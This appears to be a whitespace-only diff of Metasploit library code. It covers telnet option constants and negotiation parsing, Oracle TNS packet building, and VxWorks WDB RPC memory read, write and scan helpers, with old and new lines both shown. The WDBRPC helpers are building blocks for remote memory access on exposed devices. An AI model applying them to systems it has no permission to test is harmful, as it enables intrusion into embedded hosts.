NOP = 241.chr # "\361" # "\xf1" # nop
SE = 240.chr # "\360" # "\xf0" # end sub negotiation
EOR = 239.chr # "\357" # "\xef" # end of record (transparent mode)
ABORT = 238.chr # "\356" # "\xee" # Abort process
SUSP = 237.chr # "\355" # "\xed" # Suspend process
EOF = 236.chr # "\354" # "\xec" # End of file
SYNCH = 242.chr # "\362" # "\xf2" # for telfunc calls
OPT_BINARY = 0.chr # "\000" # "\x00" # Binary Transmission
OPT_ECHO = 1.chr # "\001" # "\x01" # Echo
OPT_RCP = 2.chr # "\002" # "\x02" # Reconnection
OPT_SGA = 3.chr # "\003" # "\x03" # Suppress Go Ahead
OPT_NAMS = 4.chr # "\004" # "\x04" # Approx Message Size Negotiation
OPT_STATUS = 5.chr # "\005" # "\x05" # Status
OPT_TM = 6.chr # "\006" # "\x06" # Timing Mark
OPT_RCTE = 7.chr # "\a" # "\x07" # Remote Controlled Trans and Echo
OPT_NAOL = 8.chr # "\010" # "\x08" # Output Line Width
OPT_NAOP = 9.chr # "\t" # "\x09" # Output Page Size
OPT_NAOCRD = 10.chr # "\n" # "\x0a" # Output Carriage-Return Disposition
OPT_NAOHTS = 11.chr # "\v" # "\x0b" # Output Horizontal Tab Stops
OPT_NAOHTD = 12.chr # "\f" # "\x0c" # Output Horizontal Tab Disposition
OPT_NAOFFD = 13.chr # "\r" # "\x0d" # Output Formfeed Disposition
OPT_NAOVTS = 14.chr # "\016" # "\x0e" # Output Vertical Tabstops
OPT_NAOVTD = 15.chr # "\017" # "\x0f" # Output Vertical Tab Disposition
OPT_NAOLFD = 16.chr # "\020" # "\x10" # Output Linefeed Disposition
OPT_XASCII = 17.chr # "\021" # "\x11" # Extended ASCII
OPT_LOGOUT = 18.chr # "\022" # "\x12" # Logout
OPT_BM = 19.chr # "\023" # "\x13" # Byte Macro
OPT_DET = 20.chr # "\024" # "\x14" # Data Entry Terminal
OPT_SUPDUP = 21.chr # "\025" # "\x15" # SUPDUP
OPT_SUPDUPOUTPUT = 22.chr # "\026" # "\x16" # SUPDUP Output
OPT_SNDLOC = 23.chr # "\027" # "\x17" # Send Location
OPT_TTYPE = 24.chr # "\030" # "\x18" # Terminal Type
OPT_EOR = 25.chr # "\031" # "\x19" # End of Record
OPT_TUID = 26.chr # "\032" # "\x1a" # TACACS User Identification
OPT_OUTMRK = 27.chr # "\e" # "\x1b" # Output Marking
OPT_TTYLOC = 28.chr # "\034" # "\x1c" # Terminal Location Number
OPT_3270REGIME = 29.chr # "\035" # "\x1d" # Telnet 3270 Regime
OPT_X3PAD = 30.chr # "\036" # "\x1e" # X.3 PAD
OPT_NAWS = 31.chr # "\037" # "\x1f" # Negotiate About Window Size
OPT_TSPEED = 32.chr # " " # "\x20" # Terminal Speed
OPT_LFLOW = 33.chr # "!" # "\x21" # Remote Flow Control
OPT_LINEMODE = 34.chr # "\"" # "\x22" # Linemode
OPT_XDISPLOC = 35.chr # "#" # "\x23" # X Display Location
OPT_OLD_ENVIRON = 36.chr # "$" # "\x24" # Environment Option
OPT_AUTHENTICATION = 37.chr # "%" # "\x25" # Authentication Option
OPT_ENCRYPT = 38.chr # "&" # "\x26" # Encryption Option
OPT_NEW_ENVIRON = 39.chr # "'" # "\x27" # New Environment Option
OPT_EXOPL = 255.chr # "\377" # "\xff" # Extended-Options-List
OPT_BINARY = 0.chr # "\000" # "\x00" # Binary Transmission
OPT_ECHO = 1.chr # "\001" # "\x01" # Echo
OPT_RCP = 2.chr # "\002" # "\x02" # Reconnection
OPT_SGA = 3.chr # "\003" # "\x03" # Suppress Go Ahead
OPT_NAMS = 4.chr # "\004" # "\x04" # Approx Message Size Negotiation
OPT_STATUS = 5.chr # "\005" # "\x05" # Status
OPT_TM = 6.chr # "\006" # "\x06" # Timing Mark
OPT_RCTE = 7.chr # "\a" # "\x07" # Remote Controlled Trans and Echo
OPT_NAOL = 8.chr # "\010" # "\x08" # Output Line Width
OPT_NAOP = 9.chr # "\t" # "\x09" # Output Page Size
OPT_NAOCRD = 10.chr # "\n" # "\x0a" # Output Carriage-Return Disposition
OPT_NAOHTS = 11.chr # "\v" # "\x0b" # Output Horizontal Tab Stops
OPT_NAOHTD = 12.chr # "\f" # "\x0c" # Output Horizontal Tab Disposition
OPT_NAOFFD = 13.chr # "\r" # "\x0d" # Output Formfeed Disposition
OPT_NAOVTS = 14.chr # "\016" # "\x0e" # Output Vertical Tabstops
OPT_NAOVTD = 15.chr # "\017" # "\x0f" # Output Vertical Tab Disposition
OPT_NAOLFD = 16.chr # "\020" # "\x10" # Output Linefeed Disposition
OPT_XASCII = 17.chr # "\021" # "\x11" # Extended ASCII
OPT_LOGOUT = 18.chr # "\022" # "\x12" # Logout
OPT_BM = 19.chr # "\023" # "\x13" # Byte Macro
OPT_DET = 20.chr # "\024" # "\x14" # Data Entry Terminal
OPT_SUPDUP = 21.chr # "\025" # "\x15" # SUPDUP
OPT_SUPDUPOUTPUT = 22.chr # "\026" # "\x16" # SUPDUP Output
OPT_SNDLOC = 23.chr # "\027" # "\x17" # Send Location
OPT_TTYPE = 24.chr # "\030" # "\x18" # Terminal Type
OPT_EOR = 25.chr # "\031" # "\x19" # End of Record
OPT_TUID = 26.chr # "\032" # "\x1a" # TACACS User Identification
OPT_OUTMRK = 27.chr # "\e" # "\x1b" # Output Marking
OPT_TTYLOC = 28.chr # "\034" # "\x1c" # Terminal Location Number
OPT_3270REGIME = 29.chr # "\035" # "\x1d" # Telnet 3270 Regime
OPT_X3PAD = 30.chr # "\036" # "\x1e" # X.3 PAD
OPT_NAWS = 31.chr # "\037" # "\x1f" # Negotiate About Window Size
OPT_TSPEED = 32.chr # " " # "\x20" # Terminal Speed
OPT_LFLOW = 33.chr # "!" # "\x21" # Remote Flow Control
OPT_LINEMODE = 34.chr # "\"" # "\x22" # Linemode
OPT_XDISPLOC = 35.chr # "#" # "\x23" # X Display Location
OPT_OLD_ENVIRON = 36.chr # "$" # "\x24" # Environment Option
OPT_AUTHENTICATION = 37.chr # "%" # "\x25" # Authentication Option
OPT_ENCRYPT = 38.chr # "&" # "\x26" # Encryption Option
OPT_NEW_ENVIRON = 39.chr # "'" # "\x27" # New Environment Option
OPT_EXOPL = 255.chr # "\377" # "\xff" # Extended-Options-List
NULL = "\000"
CR = "\015"
LF = "\012"
EOL = CR + LF
NULL = "\000"
CR = "\015"
LF = "\012"
EOL = CR + LF
#
@ -213,12 +213,10 @@ module Exploit::Remote::Telnet
data.gsub!(/#{EOL}/no, "\n")
data.gsub!(/#{IAC}(
[#{IAC}#{AO}#{AYT}#{DM}#{IP}#{NOP}]|
[#{DO}#{DONT}#{WILL}#{WONT}]
[#{OPT_BINARY}-#{OPT_NEW_ENVIRON}#{OPT_EXOPL}]|
#{SB}[^#{IAC}]*#{IAC}#{SE}
)/xno) do
m = $1
[#{IAC}#{AO}#{AYT}#{DM}#{IP}#{NOP}]|[#{DO}#{DONT}#{WILL}#{WONT}]
[#{OPT_BINARY}-#{OPT_NEW_ENVIRON}#{OPT_EXOPL}]|#{SB}[^#{IAC}]*#{IAC}#{SE}
)/xno) do
m = $1
if m == IAC
IAC
@ -249,12 +247,12 @@ module Exploit::Remote::Telnet
''
elsif m[0,1] == WONT
fd.write(IAC + DONT + m[1,1])
''
''
else
''
end
end
@trace << data
end
@trace << data
@recvd << data
fd.flush

2
lib/msf/core/exploit/tns.rb
View File

@ -82,7 +82,7 @@ module Exploit::Remote::TNS
# Version
pkt << "\x01\x39"
# Version (Compatible)
pkt << "\x01\x2C"
pkt << "\x01\x2C"
pkt << "\x00\x81\x08\x00"
pkt << "\x7F\xFF"
pkt << "\x7F\x08"

22
lib/msf/core/exploit/wdbrpc.rb
View File

@ -50,9 +50,9 @@ module Exploit::Remote::WDBRPC
# WDB_MEM_REGION
data << [
offset, # baseAddress
length, # numberOfBytes
params, # params
offset, # baseAddress
length, # numberOfBytes
params, # params
].pack("N*")
wdbrpc_request(40, data)
@ -63,9 +63,9 @@ module Exploit::Remote::WDBRPC
# WDB_MEM_REGION
data = [
offset, # baseAddress
length, # numberOfBytes
params, # params
offset, # baseAddress
length, # numberOfBytes
params, # params
].pack("N*")
wdbrpc_request(10, data)
@ -75,7 +75,7 @@ module Exploit::Remote::WDBRPC
# Make sure its DWORD aligned
while(buff.length % 4 != 0)
buff << "\x00"
buff << "\x00"
end
# WDB_MEM_XFER
@ -92,14 +92,14 @@ module Exploit::Remote::WDBRPC
def wdbrpc_request_memscan(offset=0, depth=1024, buff='', params=0)
# Make sure its DWORD aligned
while(buff.length % 4 != 0)
buff << "\x00"
buff << "\x00"
end
# WDB_MEM_REGION
data = [
offset, # baseAddress
depth, # numberOfBytes
params, # params
offset, # baseAddress
depth, # numberOfBytes
params, # params
].pack("N*")
# WDB_MEM_XFER